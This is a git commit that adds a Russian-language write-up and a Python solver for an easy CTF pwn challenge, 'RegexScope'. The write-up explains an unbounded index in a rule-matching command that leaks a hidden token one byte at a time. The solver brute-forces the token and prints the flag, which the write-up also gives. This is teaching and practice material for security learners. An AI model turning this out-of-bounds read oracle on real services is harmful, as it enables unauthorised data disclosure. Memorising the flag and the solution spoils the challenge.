Init. Commit
This commit is contained in:
@@ -0,0 +1,43 @@
|
||||
<h1 align="center">RegexScope</h1>
|
||||
|
||||
<p align="center">
|
||||
<img src="https://img.shields.io/badge/category-PWN-blueviolet" alt="PWN"/>
|
||||
<img src="https://img.shields.io/badge/difficulty-easy-brightgreen" alt="easy"/>
|
||||
</p>
|
||||
|
||||
RegexScope — стенд SOC-команды для проверки правил фильтрации. В памяти за тестовым событием лежит случайный токен экспорта. В ELF `regexscope` готового токена нет, поскольку он генерируется при старте. Движок правил позволяет проверять байты за пределами события.
|
||||
|
||||
## Решение
|
||||
|
||||
Поля состояния расположены подряд:
|
||||
|
||||
```c
|
||||
char event[32];
|
||||
char token[8];
|
||||
```
|
||||
|
||||
Сам токен занимает шесть символов из `A-Z0-9`. Правило `SCOPE <off> <hex>` сравнивает заданный байт с `event[strlen(event) + off]` и отвечает `MATCH` или `MISS`. Верхней границы индекса нет, поэтому получаем оракул чтения по одному байту.
|
||||
|
||||
В `1) set test event` отправляем 30 символов `A`. Тогда начало токена находится на два байта дальше конца строки:
|
||||
|
||||
```text
|
||||
strlen(event) + off = 30 + (i + 2) = 32 + i
|
||||
```
|
||||
|
||||
Для каждой позиции `i` от 0 до 5 перебираем алфавит. Для каждой попытки выбираем пункт `2`, дожидаемся `rule:` и передаём строку правила. Например, проверка первого байта на `A` выглядит так:
|
||||
|
||||
```text
|
||||
SCOPE 2 41
|
||||
```
|
||||
|
||||
`41` — hex-код ASCII `A`. При `MISS` пробуем следующий символ, при `MATCH` сохраняем найденный и переходим к следующему смещению. Верхняя граница — `6 × 36 = 216` проверок.
|
||||
|
||||
> Все запросы делаем в одном соединении, поскольку новый процесс получит другой токен, и уже найденные байты перестанут подходить.
|
||||
|
||||
Собираем шесть символов и передаём их в `3) export scope`. Сервис сравнивает строку с настоящим токеном и отдаёт флаг.
|
||||
|
||||
[Солвер](solve/solve.py).
|
||||
|
||||
## Флаг
|
||||
|
||||
`caplag{scoped_matcher_read_the_guard_token}`
|
||||
@@ -0,0 +1,82 @@
|
||||
#!/usr/bin/env python3
|
||||
import argparse
|
||||
import os
|
||||
import socket
|
||||
import struct
|
||||
import subprocess
|
||||
import sys
|
||||
|
||||
class Tube:
|
||||
def __init__(self, sock=None, proc=None):
|
||||
self.sock = sock
|
||||
self.proc = proc
|
||||
def recv(self, n=4096):
|
||||
if self.sock:
|
||||
return self.sock.recv(n)
|
||||
return os.read(self.proc.stdout.fileno(), n)
|
||||
def send(self, data):
|
||||
if self.sock:
|
||||
self.sock.sendall(data)
|
||||
else:
|
||||
os.write(self.proc.stdin.fileno(), data)
|
||||
def sendline(self, data):
|
||||
self.send(data + b"\n")
|
||||
def recvuntil(self, marker):
|
||||
out = b""
|
||||
while marker not in out:
|
||||
chunk = self.recv(1)
|
||||
if not chunk:
|
||||
raise EOFError(out)
|
||||
out += chunk
|
||||
return out
|
||||
|
||||
def symbol_value(binary, name):
|
||||
out = subprocess.check_output(["readelf", "-sW", binary], text=True)
|
||||
for line in out.splitlines():
|
||||
fields = line.split()
|
||||
if len(fields) >= 8 and fields[-1] == name:
|
||||
return int(fields[1], 16)
|
||||
raise RuntimeError(f"symbol not found: {name}")
|
||||
|
||||
def connect(args):
|
||||
if args.local:
|
||||
env = os.environ.copy()
|
||||
env["CTF_FLAG"] = args.flag
|
||||
proc = subprocess.Popen([args.binary], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env)
|
||||
return Tube(proc=proc)
|
||||
return Tube(sock=socket.create_connection((args.host, args.port), timeout=5))
|
||||
|
||||
def choose(io, value):
|
||||
io.recvuntil(b">")
|
||||
io.sendline(str(value).encode())
|
||||
|
||||
def main():
|
||||
p = argparse.ArgumentParser()
|
||||
p.add_argument("--host", default="127.0.0.1")
|
||||
p.add_argument("--port", type=int, default=31342)
|
||||
p.add_argument("--local", action="store_true")
|
||||
p.add_argument("--binary", default="../public/regexscope")
|
||||
p.add_argument("--flag", default="caplag{scoped_matcher_read_the_guard_token}")
|
||||
args = p.parse_args()
|
||||
io = connect(args)
|
||||
choose(io, 1)
|
||||
io.recvuntil(b"event:\n")
|
||||
io.sendline(b"A" * 30)
|
||||
token = b""
|
||||
alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
|
||||
for i in range(6):
|
||||
for c in alphabet:
|
||||
choose(io, 2)
|
||||
io.recvuntil(b"rule:\n")
|
||||
io.sendline(f"SCOPE {i+2} {c:02x}".encode())
|
||||
ans = io.recvuntil(b"\n")
|
||||
if b"MATCH" in ans:
|
||||
token += bytes([c])
|
||||
break
|
||||
choose(io, 3)
|
||||
io.recvuntil(b"token:\n")
|
||||
io.sendline(token)
|
||||
data = io.recvuntil(b"}")
|
||||
print(data[data.rfind(b"caplag{"):].decode())
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
Reference in New Issue
Block a user